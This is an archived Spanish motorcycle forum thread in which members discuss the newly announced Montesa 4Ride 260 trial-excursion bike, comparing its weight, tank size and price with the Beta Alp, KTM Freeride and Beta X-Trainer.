PDA

Ver la versión completa : MONTESA 4RIDE



JOE VESPINO
04/11/2015, 15:49
Una nueva trial-excursión para el catálogo MiguelXR33


https://youtu.be/01_yXdz51bQ

Moola!! no encuentro datos tecnicos (altura, peso, recorrido suspensiones etc) por ningún lado:confused:

FAZER
04/11/2015, 17:20
Saldra a la venta el año que viene y el 80% de las ventas estan pensadas para el extranjero.
Me gusta mucho!!

gasclassic
04/11/2015, 17:49
¿cual debe ser la base?
Por que la Cota actual no lo parece.

JOE VESPINO
04/11/2015, 18:01
Cota 4RT 260

http://estaticos02.elmundo.es/elmundomotor/imagenes/2013/07/09/motos/1373360620_0.jpg

ernestoruiz
04/11/2015, 18:46
Me encanta. Una Beta Alp puesta al día.
Si tiene buenos frenos y suspensiones puede ser muy divertida

RobertoDT
04/11/2015, 19:13
Otra mas para unirse al club de la Scorpa T-Ride, KTM freeride, Y la Ossa, que no se como se llama.
Muy bien para paseos, pero como quieras hacer una ruta trail con otras trails falta moto por todos lados.
Otra cosa es usarla para lo que es trial excursión. Ahí si.
Las Beta Alp actuales son trail, por desarrollo, peso y chasis.

idscasper
04/11/2015, 19:31
Me gusta mucho. A cuanta pasta vale!

transalacant
04/11/2015, 19:38
Está chula, pero yo la veo demasiado trial y poco "excursión"

Heribert
04/11/2015, 21:12
Muy chula, tambien el video. Me ha recoradado a la Alp al momento. Yo la veo muy enfocada al campo, Pero me parece muy buen concepto igualmente.

CAGANER
04/11/2015, 21:16
315

http://www.futuretrial.com/wp-content/uploads/Montesa-Cota-315-A.M.1.jpg

luismi07
04/11/2015, 21:21
Pues como pese similar a una trial, lo han bordao. Lo malo que son 7500€

manchi
04/11/2015, 21:25
Pues como pese similar a una trial, lo han bordao. Lo malo que son 7500€

Luismi, ¡que solo se vive una vez!

MiguelXR33
04/11/2015, 21:26
Una nueva trial-excursión para el catálogo MiguelXR33



https://youtu.be/01_yXdz51bQ


Moola!! no encuentro datos tecnicos (altura, peso, recorrido suspensiones etc) por ningún lado

Maldita sea, yo quería haberos dado la noticia antes de comer y al final he llegado tarde... Menos mal que aquí siempre estamos al día. :-D Voy a buscar datos a ver que encuentro para un artículo.

No lo dudes Joe, irá al Catálogo 2016... estoy esperando a ver si salen más cosas a añadir. :birra:



Por cierto, el Catálogo 2015 es éste y en él, claro, hay un apartado Trial-Excursión...

CATÁLOGO TRAIL, SCRAMBLER Y S.U.V. 2015 (http://www.voromv.com/2014/12/catalogo-trail-y-suv-2015-parte-uno.html)

Cherokee
04/11/2015, 22:23
Y un poco mas de originalidad en el nombre? (free ride, 4 ride, no se que ride...)

Ale ya teneis la respuesta gilipofriki del dia :raya:

rubi
04/11/2015, 22:57
Pues a mi no me gusta. Yo no veo esa similitud con la ALP 4.0

JOE VESPINO
04/11/2015, 23:11
Otra mas para unirse al club de la Scorpa T-Ride, KTM freeride, Y la Ossa, que no se como se llama.
Muy bien para paseos, pero como quieras hacer una ruta trail con otras trails falta moto por todos lados.
Otra cosa es usarla para lo que es trial excursión. Ahí si.
Las Beta Alp actuales son trail, por desarrollo, peso y chasis.

Bueno, no todos tenemos el mismo concepto de lo que es una "ruta trail" y quizás a muchos nos sirva.

Lo de las beta alp actuales no sé porque lo dices, la 125 y la 200 para mi son las más trial de todas, de hecho hasta las puedes llevar sin asiento

http://static2.masmoto.net/novedades/files/2014/02/beta-alp-200-2014_08.jpg

MiguelXR33
05/11/2015, 00:21
Bueno, un poco de mi rollo... Aquí la historia de las Montesa Cota T (Trail, Excursión, Evasión) y unos datos técnicos de la 4-Ride.

Novedades 2016. Montesa 4-Ride 260: La Cota Trail del Siglo XXI. Historia del modelo Cota T/Evasión, y fotos y vídeo de la nueva 4-Ride (http://www.voromv.com/2015/11/novedades-2016-montesa-4-ride-260-la.html)
http://3.bp.blogspot.com/-hv1bCAcwfyc/VjqPi6GhkWI/AAAAAAAAUL0/sjx_A6zDkOk/s640/20.jpg




Y un poco mas de originalidad en el nombre? (free ride, 4 ride, no se que ride...)

Ale ya teneis la respuesta gilipofriki del dia :raya:

Totalmente de acuerdo Cherokee. Una "Ride" vale... pero es que está la Sherco T-Ride, la Scorpa X-Ride y la KTM Freeride... y todas van al mismo tipo de cliente. Un poquito de originalidad hubiera estado muy bien... Que sepas que te nombro en el artículo.

Kavaláris
05/11/2015, 00:36
Está chula, pero yo la veo demasiado trial y poco "excursión"

+1 de "excursión" poco y nada ........

jordiXF
05/11/2015, 09:15
Pues a mi me gusta, creo que es un concepto de moto que irá a más. Con esa autonomía asiento y suspensiones te puedes marcar unas exploratorias guapas. Y está hecha en casa!! :)

JOE VESPINO
05/11/2015, 09:20
Bueno, un poco de mi rollo... Aquí la historia de las Montesa Cota T (Trail, Excursión, Evasión) y unos datos técnicos de la 4-Ride.

Novedades 2016. Montesa 4-Ride 260: La Cota Trail del Siglo XXI. Historia del modelo Cota T/Evasión, y fotos y vídeo de la nueva 4-Ride (http://www.voromv.com/2015/11/novedades-2016-montesa-4-ride-260-la.html)


http://3.bp.blogspot.com/-hv1bCAcwfyc/VjqPi6GhkWI/AAAAAAAAUL0/sjx_A6zDkOk/s640/20.jpg





Totalmente de acuerdo Cherokee. Una "Ride" vale... pero es que está la Sherco T-Ride, la Scorpa X-Ride y la KTM Freeride... y todas van al mismo tipo de cliente. Un poquito de originalidad hubiera estado muy bien... Que sepas que te nombro en el artículo.

Por fin veo los datos.

En lo bueno los 85 kilos, que maravilla. Creo que no hay nada que ni se acerque salvo la scorpa long-ride, de la que he oido y leido cosas pero jamas he visto ninguna

En lo malo, solo 4,4 litros de depósito (con un par de ellos mas hubiera quedado de cine). Tambien se me antoja un poco alta con 88,5 cms al suelo (en comparación a las Alp), espero que eso signifique mas recorrido de suspensiones.

Saludos.

gasclassic
05/11/2015, 10:43
Cota 4RT 260

http://estaticos02.elmundo.es/elmundomotor/imagenes/2013/07/09/motos/1373360620_0.jpg

http://3.bp.blogspot.com/-hv1bCAcwfyc/VjqPi6GhkWI/AAAAAAAAUL0/sjx_A6zDkOk/s640/20.jpg

Ahora que la veo en foto y no en vídeo, si parece que toma de base la Cota.
Sobre lo que decís, también creo que le falta un poco mas de depósito, que viendo todo el espacio que hay debajo del asiento, no entiendo como es tan pequeño.
Sea como sea, es un modelo nuevo y eso en un segmento tan pobre se agradece.
Como también se agradece que 40 años después, Montesa siga con la tradición de "trailizar" trialeras:

http://www.yclasicos.com/spa/item/extractimg.cgi?action=large&code=ART28263

Tino.
05/11/2015, 12:42
En efecto. Ese concepto ya estaba "inventado" con las Cota's TRAIL, donde creo que la 1ª, 2ª y 3ª velocidad eran iguales a las de trial, estirando más las 4ª, 5ª y 6ª
¿No es así David? :o

Hace años me juntaba con un grupo de Palautordera con los que hacíamos unas largas excusiones por el Montseny únicamente válidas para motos de trial, llevábamos una "lata" de gasofa de 2 L. Con la aparición del modelo TRAIL, ya no hacía falta.

rubi
05/11/2015, 14:04
Pues a mi no me gusta. Yo no veo esa similitud con la ALP 4.0

Me he equivocado con lo de la beta, pensé que hablabais de la 4.0

gasclassic
05/11/2015, 15:57
En efecto. Ese concepto ya estaba "inventado" con las Cota's TRAIL, donde creo que la 1ª, 2ª y 3ª velocidad eran iguales a las de trial, estirando más las 4ª, 5ª y 6ª
¿No es así David? :o

Hace años me juntaba con un grupo de Palautordera con los que hacíamos unas largas excusiones por el Montseny únicamente válidas para motos de trial, llevábamos una "lata" de gasofa de 2 L. Con la aparición del modelo TRAIL, ya no hacía falta.

A veces el cambio era simple a mas no poder, poner un piñón con 1 diente mas.

barbo7
07/11/2015, 21:47
Está bien que se intenten llenar todos los sectores del mercao,pero me pregunto porque no hay casi nada en el trail ligero(o algo que se le parezca) entre los 250 y 500cc.
Casi parece un fenómeno a estudiar.
Porque esta claro que esta moto cumple con las diferentes normativas europeas.A mi parecer creo que es una moto un tanto minoritaria¿porque se invierte en fabricar un producto de estas características,y no,en una moto que (a priori)puede abarcar un mayor numero de usuarios?.

JOE VESPINO
08/11/2015, 16:59
Buena reflexión, yo creo que en este modelo tampoco es que hayan innovado -ni invertido- demasiado, es un modelo derivado de una moto de trial en producción. Si Montesa hace lo mismo que beta con las alp o sherco con la t.ride, es que es una aventura rentable.

barbo7
08/11/2015, 18:15
Bien,¿no es una aventura rentable una trail con base en las 450 de enduro,aunque le quites los componentes pata negra para rebajar un poco el precio?.
Esta claro que no......

gasclassic
09/11/2015, 18:41
Está bien que se intenten llenar todos los sectores del mercao,pero me pregunto porque no hay casi nada en el trail ligero(o algo que se le parezca) entre los 250 y 500cc.
Casi parece un fenómeno a estudiar.
Porque esta claro que esta moto cumple con las diferentes normativas europeas.A mi parecer creo que es una moto un tanto minoritaria¿porque se invierte en fabricar un producto de estas características,y no,en una moto que (a priori)puede abarcar un mayor numero de usuarios?.

Yo creo que hay varias razones, no una sola.
Primero está claro que muy rentable no debe ser, si no lo harían.
Luego quizás tenga algo que ver con la imagen de la marca.
Y a veces no venden lo que pedimos, si no que venden lo que quieren que compremos.
No creo que les interese vender motos cojonudas que nos duren 20 años.
Pero si buenas motos, susceptibles de mejora, que harán que te la cambies cada poco, precisamente por que ha mejorado.

Sea como sea, independientemente de si somos muy llorones o quejicas, yo si echo en falta motos mas lógicas.
Sin tanta parafernalia, que muchas veces solo es marketing.
Algo sencillo, barato, pero que sea efectivo, tampoco un trozo de hierro a precio de oro.

Con lo límites de velocidad actuales, mas los propios de llevar tacos de enduro, una "sencilla" 250 o 450 debería ser suficiente, aun con solo 30 o 40 cv.

Pero nos calentamos rápido (solo tenemos una neurona y suele estar en la entrepierna) y si podemos ir con 70 cv, mejor que con 50 cv.

Y por carretera ya es de risa, no entiendo como aun se venden motos con 150 cv, o mas.

¿tan difícil sería hacer una XR o TT 450 con 4 detalles modernos?
Inyección, motor potente pero a la vez utilizable, ponle 40 cv, de unos 120 kg y evidentemente arranque eléctrico.
Hablo de algo mas civilizado que las CRF y WR.

Pero luego ves las KTM Freeride y creo que apenas se venden, por que de hecho, no veo ni una.
Pero claro, no dejan de ser solo 23 cv y tampoco es barata, por que a 7.300 €, tela.
¿de verdad les cuesta tanto fabricarla?

Ya se que me repito mas que el ajo, pero mi opinión es que el segmento del trail da pena verlo.
Así que cualquier novedad, bienvenida sea, aunque luego no vendan ni 4.

luismi07
09/11/2015, 19:08
A mi es que los precios de las motos nuevas, me parecen tan desproporcionados, que nunca me he planteado comprar una nueva.
Teniendo en cuenta la gran cantidad de oferta de segunda mano y a precios mas razonables, con muy pocos km. Por que será.

Veo que la gente se cambia mucho de modelo, y nunca esta contento o tiene suficiente. Hablan de trail de 85 CV y les parece poco, dicen que se queda corta con pasajero y equipaje. "Anda ya" hay que buscar la de 105.
Se compran la 2014 y en cuanto sale la 2015, suspiran...... Bueno cada cual hace con su dinero lo que quiere, pero me parece una pasada.
Y lo que esta claro es, que saquen lo que saquen, nunca nos parece bien ni suficiente.

Yo tengo una con 40 teoricos CV y me sobran la mitad.Lo que si me gustaria por razones evidentes, es menos peso

Tino.
09/11/2015, 19:23
Pero luego ves las KTM Freeride y creo que apenas se venden, por que de hecho, no veo ni una.
Si que se venden David. Conozco un par de tíos de foro que la tienen, y en el CEB tengo a dos más. Todos han cogido la 3'5 que pesa 100 Kg justos y están supercontentos con ellas, pues les permite hacer enduro ligth, y a la vez abordar todas las trialeras, por chungas que sean. Aunque también reconocen lo "limitados" que se quedan, pues por carretera apenas pueden pasar de los 80 Km/h y la autonomía es justa. Vaya que sólo para salidas locales, que es lo que muchos hacen.

He tenido ocasión de subirme en una, y lo primero que notas es lo estrechita que es, lo bajita que se queda y lo bien que se llega al suelo. Pero luego empiezas a meter marchas y pierde todo el encanto (al menos para mí). Aunque eso sí, te atreves con todo, porque va estupenda para "remar" en las trialeras.

Y tiene su público, no creas...

Tino.
09/11/2015, 19:31
A mi es que los precios de las motos nuevas, me parecen tan desproporcionados, que nunca me he planteado comprar una nueva.
Teniendo en cuenta la gran cantidad de oferta de segunda mano y a precios mas razonables, con muy pocos km. Por que será.
No hay peor inversión que comprarse motos/coches nuevas, pues la desvalorización que sufren es brutal, pero bueno, supongo que también dependerá de los kilómetros que se hagan al cabo del año. Personalmente salgo mucho (con la 690 llevo más de 15.000 Km en menos de 14 meses) y las motos me "duran" poco, aunque ahora he encontrado la que me llena de verdad, y al ritmo del último año me durará como mucho tres. Y luego pienso, por primera vez, repetir modelo (aunque tal vez haya que mirarse la Husky 701) a no ser que otras marcas se involucren en el sector.

En todo caso, se trata de buscar la moto que quieres a buen precio y con pocos kilómetros, que con paciencia, acaba saliendo.

RobertoDT
09/11/2015, 19:49
Si que se venden David. Conozco un par de tíos de foro que la tienen, y en el CEB tengo a dos más. Todos han cogido la 3'5 que pesa 100 Kg justos y están supercontentos con ellas, pues les permite hacer enduro ligth, y a la vez abordar todas las trialeras, por chungas que sean. Aunque también reconocen lo "limitados" que se quedan, pues por carretera apenas pueden pasar de los 80 Km/h y la autonomía es justa. Vaya que sólo para salidas locales, que es lo que muchos hacen.

Eso me pasó a mi con la Scorpa 250. Y si a ello le sumas que el grupillo de endureros con el que salia desapareció (Lesiones, traslados laborales, problemas familiares.) Pues ya me tienes 2 años intentando usar la moto aunque fuera en salidas trail y pasándolo mal con ella con un ritmo para el que no estaba diseñada.

gasclassic
09/11/2015, 20:10
A mi es que los precios de las motos nuevas, me parecen tan desproporcionados, que nunca me he planteado comprar una nueva.
Teniendo en cuenta la gran cantidad de oferta de segunda mano y a precios mas razonables, con muy pocos km. Por que será.

Veo que la gente se cambia mucho de modelo, y nunca esta contento o tiene suficiente. Hablan de trail de 85 CV y les parece poco, dicen que se queda corta con pasajero y equipaje. "Anda ya" hay que buscar la de 105.
Se compran la 2014 y en cuanto sale la 2015, suspiran...... Bueno cada cual hace con su dinero lo que quiere, pero me parece una pasada.
Y lo que esta claro es, que saquen lo que saquen, nunca nos parece bien ni suficiente.

Yo tengo una con 40 teoricos CV y me sobran la mitad.Lo que si me gustaria por razones evidentes, es menos peso

Pienso lo mismo, tanto en comprar usado, como en lo que compramos.
A veces queremos mas y a la hora de la verdad, acabamos usando menos.
Que me lo digan a mi, que con la 690 me sobra moto por todos lados.
Pero eso si, es de esas cosas que no te arrepientes de comprar, aunque la vendas al poco, porque te queda la experiencia.

gasclassic
09/11/2015, 20:21
Si que se venden David. Conozco un par de tíos de foro que la tienen, y en el CEB tengo a dos más. Todos han cogido la 3'5 que pesa 100 Kg justos y están supercontentos con ellas, pues les permite hacer enduro ligth, y a la vez abordar todas las trialeras, por chungas que sean. Aunque también reconocen lo "limitados" que se quedan, pues por carretera apenas pueden pasar de los 80 Km/h y la autonomía es justa. Vaya que sólo para salidas locales, que es lo que muchos hacen.

He tenido ocasión de subirme en una, y lo primero que notas es lo estrechita que es, lo bajita que se queda y lo bien que se llega al suelo. Pero luego empiezas a meter marchas y pierde todo el encanto (al menos para mí). Aunque eso sí, te atreves con todo, porque va estupenda para "remar" en las trialeras.

Y tiene su público, no creas...

Igual pido peras al olmo, pero creo que ese concepto un poco mas elaborado si sería la leche.
Para empezar un poco mas de potencia, tampoco mucha, pero 40 cv si los veo necesarios al poco que se hagan pistas y carretera.
Y 6 marchas!, ¿Qué es eso de que lleven solo 5?
Una 6 larga te permite ir ronroneando a 100, sin perder empuje en subidas o velocidades muy lentas.
Y luego, aunque pesara un poco mas, 120 kg tampoco lo veo excesivo, un poco mas de trail y un poco menos de trial.
Una autonomía de 200 km es casi lo mínimo para ir tranquilo.
Al igual que un asiento trail y no de enduro para pasarse horas sentado.
Ya no hablo de carenados, que para ir con tacos a 100-110, no hace falta.
Y que se quedara en unos 5.000 € caramba!
Rollo CRF250L pero con 15 cv mas y 15 kg menos.
O esa Freeride, pero con 15 cv mas y 2.000 € menos, aun a costa de pesar 15 kg mas o de tener componentes menos pro.

Hoy, con casi cualquier enduro de serie tal cual la venden, se puede competir y en la vida real, ni nosotros somos Marc Coma, ni nuestras salidas son etapas del Dakar de turno.

barbo7
10/11/2015, 09:56
Que si,blablabla,pero que no las hacen,y no hay donde elegir.
No se si alguien tiene contactos con algún fabricante y nos podría ilustrar.

JOE VESPINO
10/11/2015, 10:21
Jajjjj, otro que le echaron de la escuela diplomatica!!

Gassclassic, esa moto que tu buscas (43 caballos, 114 kilos en vacio, 6 velocidad larga, 5300 rpm a 100 kms/hora con desarrollo de enduro 13/52, 150 kms de autonomia facilmente ampliables a mas de 200 con cualquier deposito extra, asiento comodo power parts, etc., la has tenido en la sección de compra-venta durante todo el verano a un precio de amigo!! ;)

gasclassic
10/11/2015, 10:58
Jajjjj, otro que le echaron de la escuela diplomatica!!

Gassclassic, esa moto que tu buscas (43 caballos, 114 kilos en vacio, 6 velocidad larga, 5300 rpm a 100 kms/hora con desarrollo de enduro 13/52, 150 kms de autonomia facilmente ampliables a mas de 200 con cualquier deposito extra, asiento comodo power parts, etc., la has tenido en la sección de compra-venta durante todo el verano a un precio de amigo!! ;)

Ostias Joe, no me digas eso.
¿a cual te refieres? por que mira que esa sección la miro a menudo.

JOE VESPINO
10/11/2015, 11:03
Una ktm exc400 que puso ahí uno que yo me sé. Ya, ya lo sé, es una enduro.

Edito, con el 13/52 a 100 por hora en 6ª va a 5700 rpm

Tino.
10/11/2015, 11:37
Una ktm exc400 que puso ahí uno que yo me sé. Ya, ya lo sé, es una enduro.
Un compañero de otro foro la tiene (mod. 2008) y con cuatro retoques (depósito, desarrollo, sillín, suspensiones...) se la ha convertido en una enduro/trail de órdago. El único hándicap es la mayor frecuencia de revisiones y cambios de aceite, pero está asumido.

JOE VESPINO
10/11/2015, 11:58
Pues si, sorprendentemente, pese a ser una supuesta enduro de marca tan readytorace y tal y cual, al final es de lo mas trailizable del mercado, incluso con el desarrollo mas endurero (13-52) puedes hacer enlaces a 90-100 por hora a regímenes bajisimos para ser una enduro (la unica que lo iguala en eso es la EXC500 actual). Al final me la quedo, asiento comodo ya le puse y se nota muchisimo, igual pedimos a los reyes powerdays el depósito de 13 litros.

gasclassic
10/11/2015, 12:01
Una ktm exc400 que puso ahí uno que yo me sé. Ya, ya lo sé, es una enduro.

Edito, con el 13/52 a 100 por hora en 6ª va a 5700 rpm

Como dices es una enduro, con lo que ello comporta no solo a nivel de mantenimiento, si no también a nivel de comodidad de suspensiones, altura al suelo, posibilidad de llevar a alguien.
Enduros ya hay, si yo no me quejo de eso, lo que encuentro a faltar son trails, o sea, "enduros civilizadas"
Aun así, tentado estuve (de hecho estuvimos en contacto) de pillarle la WR450 a Caganer, pero al final me decidí por la 690.

martinus
10/11/2015, 13:10
Sea el tema que sea, al final parece que el personal siempre acaba viniendo a hablar de "su libro"....!!!! pero en el hilo creo que no se habla de motos trail a la usanza general del foro de mas de 450cc., sino de alternativas ligeras para dar un paseo por el campo. Y si de motos ligeras se trata, a mi me parece que todas estas nosequé-ride son un poco de juguete. No me fío de esas horquillas "finitas", y creo que la ligereza y otro tipo de ventajas que puedan tener para hacer campo, te las ofrece igualmente una 2T de 250 (vease Betta RR'16) pero siendo una moto "de verdad". El concepto probablemente tiene su público, pero supongo que un público 100% campero que se quiere iniciar y no va a hacer mucho el cabra, o que está ya cansado del riesgo y se quiere quitar. Yo personalmente, para hacer lo que se podría hacer con esto, ya digo que preferiría irme al 2T. Y si ya la quieres con mas punta de velocidad y que si mas autonomía y que si mas asiento o no sé qué, pues ya no es esta idéa, será otra. Conclusión: no es que no hagan lo que el público pide, sino que cuanta mas oferta donde elegir, mas posibilidades de vender. Si está to inventao, no le déis mas vueltas hombre!!!!

gasclassic
10/11/2015, 16:04
Sea el tema que sea, al final parece que el personal siempre acaba viniendo a hablar de "su libro"....!!!! pero en el hilo creo que no se habla de motos trail a la usanza general del foro de mas de 450cc., sino de alternativas ligeras para dar un paseo por el campo. Y si de motos ligeras se trata, a mi me parece que todas estas nosequé-ride son un poco de juguete. No me fío de esas horquillas "finitas", y creo que la ligereza y otro tipo de ventajas que puedan tener para hacer campo, te las ofrece igualmente una 2T de 250 (vease Betta RR'16) pero siendo una moto "de verdad". El concepto probablemente tiene su público, pero supongo que un público 100% campero que se quiere iniciar y no va a hacer mucho el cabra, o que está ya cansado del riesgo y se quiere quitar. Yo personalmente, para hacer lo que se podría hacer con esto, ya digo que preferiría irme al 2T. Y si ya la quieres con mas punta de velocidad y que si mas autonomía y que si mas asiento o no sé qué, pues ya no es esta idéa, será otra. Conclusión: no es que no hagan lo que el público pide, sino que cuanta mas oferta donde elegir, mas posibilidades de vender. Si está to inventao, no le déis mas vueltas hombre!!!!

Pero es que no solo es un problema de peso.
Las enduro actuales son muy altas y eso por pista da igual, pero si te toca remar en una trialera........
Están las trial-excursión, como esta Montesa, pero las veo infra-motorizadas.
Como dices, casi parecen orientadas a noveles o a abuelos que ya están de vuelta de todo.
Con lo cual, después de todo el rollo, dos motos es lo mínimo y tres lo suyo :lol: así lo cubrimos todo.

martinus
10/11/2015, 17:04
Estamos de acuerdo!!!

volviendo al tema de las alternativas, a lo que me refería con una moto de 2T que tuviera las mismas ventajas pero mas "alegría" es a la Beta Xtrainer. Aquí un comparativo de la 300 con su hermana mayor, la purasangre RR. La Xtrainer ya no es tan alta, depósito aceite independiente, arranque eléctrico, electroventilador, 6 marchas,....

http://www.motosdeenduro.com/2015/03/beta-x-trainer-beta-rr-300-enduro.html

Por cierto, de esta X-Trainer si que se habla en el blog de Miguel y además comparándola con la freeride:

http://www.voromv.com/2014/11/novedades-2015-beta-x-trainer-300.html

Yo me quedo con la Beta de largo, de hecho me estoy calentando.....

gasclassic
10/11/2015, 17:34
Estamos de acuerdo!!!

volviendo al tema de las alternativas, a lo que me refería con una moto de 2T que tuviera las mismas ventajas pero mas "alegría" es a la Beta Xtrainer. Aquí un comparativo de la 300 con su hermana mayor, la purasangre RR. La Xtrainer ya no es tan alta, depósito aceite independiente, arranque eléctrico, electroventilador,....

http://www.motosdeenduro.com/2015/03/beta-x-trainer-beta-rr-300-enduro.html

osti, que chula es XTrainer, ilustro y pongo enlace del compañero MiguelXR33:

http://2.bp.blogspot.com/-dRYqjsbjBrE/VGsVbTLXQXI/AAAAAAAAOn8/qI6k_WHW9vE/s1600/Beta-X-trainer-late4272_10152329966751152_6685969570862850416_o.j pg

http://www.voromv.com/2014/11/novedades-2015-beta-x-trainer-300.html


Los datos:

Datos Técnicos Beta X-Trainer 300MOTOR
=======
293cc
Keihin de 36
Arranque electrico (KickStarter opcional)
Seis marchas
Engrase por separado.
35 cv

CHASIS.
======
Perimetral de acero al cromo-molibdeno
Sub-chasis desmontable de cromo-molibdeno.
Basculante de aluminio.

SUSPENSIONES
=============
Horquilla invertida de 43ø R16v 270mm de recorrido
Amortiguador R16v 270mm de recorrido
Bieletas

FRENOS
=======
Nissin de 260/240
Pinzas flotantes de dos pistones delante y uno atrás.

LLANTAS
========
Estandar 21 delante y 18 detrás

MEDIDAS
========
Peso: 98kg (104 Beta RR 300)
Altura asiento; 910mm (940mm Beta RR 300)
Altura libre suelo: 320mm (320mm idem Beta RR 300)
Distancia entre ejes de 1.467mm (1.482mm Beta RR 300)
Deposito: 8'5 litros (9'5 litros Beta RR 300)
Engrase de mezcla por separado


Con una altura de 91 cm la veo alta, aunque al ir con bieletas se podrá bajar, pero contando con tanta altura libre, ¿Qué les costaría dejarla en unos mas españoles 86 cm?
35 cv para off-road los veo suficientes.
Y un 2T tiene su encanto.


https://lh3.googleusercontent.com/-_v2hnkgl2Ss/VGxUqxkfjyI/AAAAAAAAM4Y/7VXK2H-eQTQ/w1022-h563-no/power-036.jpg

Y el precio unos 6.200 €, son 1.000 € menos que la KTM, pero a mi modo de ver, siguen siendo bastante para lo que es.
Bueno, en general, las moto de campo me parecen carísimas.
Y otro inconveniente es el no poder llevar pasajero, aunque solo sea ocasional, como llevar al peque al cole.

gasclassic
10/11/2015, 17:38
Estamos de acuerdo!!!

volviendo al tema de las alternativas, a lo que me refería con una moto de 2T que tuviera las mismas ventajas pero mas "alegría" es a la Beta Xtrainer. Aquí un comparativo de la 300 con su hermana mayor, la purasangre RR. La Xtrainer ya no es tan alta, depósito aceite independiente, arranque eléctrico, electroventilador, 6 marchas,....

http://www.motosdeenduro.com/2015/03/beta-x-trainer-beta-rr-300-enduro.html

Por cierto, de esta X-Trainer si que se habla en el blog de Miguel y además comparándola con la freeride:

http://www.voromv.com/2014/11/novedades-2015-beta-x-trainer-300.html

Yo me quedo con la Beta de largo, de hecho me estoy calentando.....

:lol: mientras escribía mi respuesta, veo que has editado la tuya con el enlace de MiguelXR33.

Si, yo también estoy empezando a babear.
6.200 € no, pero alguna de ocasión..........

motranqui
10/11/2015, 19:08
Vamos a ver... Un 2T ¿para trail? :confused: con lo que gastan, depósito de 8´5l, asiento de enduro, motor rabiosillo, posición 100% al ataque, sin subchasis, luces de risa, ninguna gracia (imagino que sin llave de tapón de gasolina, ni general) etc, etc, etccccccccc

Una Xtrainer no es una moto de trail, en todo caso una moto de enduro "lógica" o "enduro light"

Orden :hammer:

JOE VESPINO
10/11/2015, 19:16
Sea el tema que sea, al final parece que el personal siempre acaba viniendo a hablar de "su libro"....!!!! pero en el hilo creo que no se habla de motos trail a la usanza general del foro de mas de 450cc., sino de alternativas ligeras para dar un paseo por el campo. Y si de motos ligeras se trata, a mi me parece que todas estas nosequé-ride son un poco de juguete. No me fío de esas horquillas "finitas", y creo que la ligereza y otro tipo de ventajas que puedan tener para hacer campo, te las ofrece igualmente una 2T de 250 (vease Betta RR'16) pero siendo una moto "de verdad". El concepto probablemente tiene su público, pero supongo que un público 100% campero que se quiere iniciar y no va a hacer mucho el cabra, o que está ya cansado del riesgo y se quiere quitar. Yo personalmente, para hacer lo que se podría hacer con esto, ya digo que preferiría irme al 2T. Y si ya la quieres con mas punta de velocidad y que si mas autonomía y que si mas asiento o no sé qué, pues ya no es esta idéa, será otra. Conclusión: no es que no hagan lo que el público pide, sino que cuanta mas oferta donde elegir, mas posibilidades de vender. Si está to inventao, no le déis mas vueltas hombre!!!!

Pues a ti te valdrá una enduro 2T para lo mismo, para mi no tiene nada que ver. Una RR300 tiene unos horquillones de 48 mms de diametro, para comerse cortados, subir cortafuegos en tercera a fondo o pegar saltos de tres metros. Para mi una enduro 2T es un pura sangre, no una moto flanders para hacerse excursiones, ni mucho menos aprender.

Lo que ha hecho Beta con la xtrainer sobre la base de la RR300, con su horquilla "finita" de 43 mms, bajita, ligera y con el motor 300 2t amariconao, es intentar llegar a este mismo concepto "moñas-ride" por otro camino, partiendo de una moto de enduro; igual que Montesa o Beta lo Alp lo hacen partiendo de una moto de trial. Al final cada con sus "genes" pero todas van al mismo público, gente que quiere echar la mañana sin grandes complicaciones, probablemente lo más alejado de un endurero de 2T.

gasclassic
10/11/2015, 19:25
Vamos a ver... Un 2T ¿para trail? :confused: con lo que gastan, depósito de 8´5l, asiento de enduro, motor rabiosillo, posición 100% al ataque, sin subchasis, luces de risa, ninguna gracia (imagino que sin llave de tapón de gasolina, ni general) etc, etc, etccccccccc

Una Xtrainer no es una moto de trail, en todo caso una moto de enduro "lógica" o "enduro light"

Orden :hammer:

Eso, eso, pon orden que aquí nos encendemos mas rápido que una cerilla.

Ahora bien, un 2 T no tiene por que ser gastón, dependerá de lo apretado que esté.
Un simple Vespino de serie gastaba poco mas de 2 L a los 100 km, una vez trucado, se iba fácilmente a los 6 L.
Según parece esta 300 2T está descafeinada a 35 cv, lo que es poco para un 300 de 2T moderno (trialeras aparte), con lo cual no me extrañaría que esos 8,5 L den para 150 km tranquilamente.
Aun así, te doy la razón, que menos que meterle 12 o 15 L, que tampoco es tanto!

Luego, a veces lo que no te gastas poco a poco en la gasolinera, te lo gastas de golpe en las revisiones,
Un 2 T pide poco pan, aros, algún pistón y cojinetes muy de vez en cuando.
Una 4T, como esté un poco apretada, en distribución te puedes dejar una pasta, a parte que ya no es tan sencillo meterle mano uno mismo.
Ahí no veo mal un 2 T.
Incluso si te planteas viajar, que antes se hacía mucho con esas 125 de carretera y aguantaban bien y eso que iban apretadas.

En lo del asiento te vuelvo a dar la razón, no hace falta un sofá, pero digo yo que hay un término medio.

Este 2 T según parece no es rabiosillo, de ahí que de muchas menos potencia que su hermana de enduro.
Sale desde abajo, como tendrían que ser todos los motores para off-road.

Y si te doy la razón de nuevo, mas que trail, parece una enduro civilizada, pero ¿Qué es una trail? si no una enduro civilizada.

Coña aparte, creo que con 4 detalles, si hubieran hecho una trail cojonuda.
Menor altura de asiento, este mas cómodo, un poco mas de depósito y un subchasis para llevar pasajero y ...............top case! (un saludo JOE :-P)

gasclassic
10/11/2015, 19:31
Pues a ti te valdrá una enduro 2T para lo mismo, para mi no tiene nada que ver. Una RR300 tiene unos horquillones de 48 mms de diametro, para comerse cortados, subir cortafuegos en tercera a fondo o pegar saltos de tres metros. Para mi una enduro 2T es un pura sangre, no una moto flanders para hacerse excursiones, ni mucho menos aprender.

Lo que ha hecho Beta con la xtrainer sobre la base de la RR300, con su horquilla "finita" de 43 mms, bajita, ligera y con el motor 300 2t amariconao, es intentar llegar a este mismo concepto "moñas-ride" por otro camino, partiendo de una moto de enduro; igual que Montesa o Beta lo Alp lo hacen partiendo de una moto de trial. Al final cada con sus "genes" pero todas van al mismo público, gente que quiere echar la mañana sin grandes complicaciones, probablemente lo más alejado de un endurero de 2T.

Pero es que este 300 2 T no es igual que el 300 2 T de la RR de enduro.
Como dices está "amariconao" :lol:
Y aun y así, anda mas que los 4 T de las RIDE, pero sin la mala leche de los 2 T full de las enduro de verdad.
Yo no lo veo mala idea.

Otra cosa es que falle en otros detalles.
Entre lo que no veo la horquilla, que una invertida de 43 tampoco es que sea una mierda pinchá en un palo.
Vale, no servirá para hacer triples, pero tampoco es el de una trialera venida a mas, con un recorrido corto.

